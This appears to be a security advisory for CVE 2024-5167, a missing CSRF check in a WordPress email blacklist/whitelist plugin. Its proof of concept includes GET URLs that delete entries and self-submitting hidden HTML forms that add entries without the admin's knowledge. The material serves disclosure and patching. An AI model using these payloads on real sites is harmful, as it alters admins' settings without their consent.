CM Email Registration Blacklist and Whitelist < 1.4.9 – Add/Delete Emails via CSRF Add and delete any item from blacklist/whitelist | CVE 2024-5167

Description

The plugin does not have CSRF check when adding or deleting an item from the blacklist or whitelist, which could allow attackers to make a logged in admin add or delete settings from the blacklist or whitelist menu via a CSRF attack

Proof of Concept

Delete item from blacklist by ID:

`http://example.com/wp-admin/admin.php?page=cmeb_menu&cmeb_email_black=delete&black_id=2`

Delete item from whitelist by ID:

`http://example.com/wp-admin/admin.php?page=cmeb_menu&cmeb_white=delete&white_id=2`

Add to whitelist:

```
<html>
  <body>
    <form action="http://example.com/wp-admin/admin.php?page=cmeb_menu" method="POST">
      <input type="hidden" name="cmeb&#95;white" value="add" />
      <input type="hidden" name="white&#95;domain" value="asas&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```

Add to blacklist:

```
<html>
  <body>
    <form action="http://example.com/wp-admin/admin.php?page=cmeb_menu" method="POST">
      <input type="hidden" name="cmeb&#95;email&#95;black" value="add" />
      <input type="hidden" name="black&#95;email" value="asaas&#64;asas&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```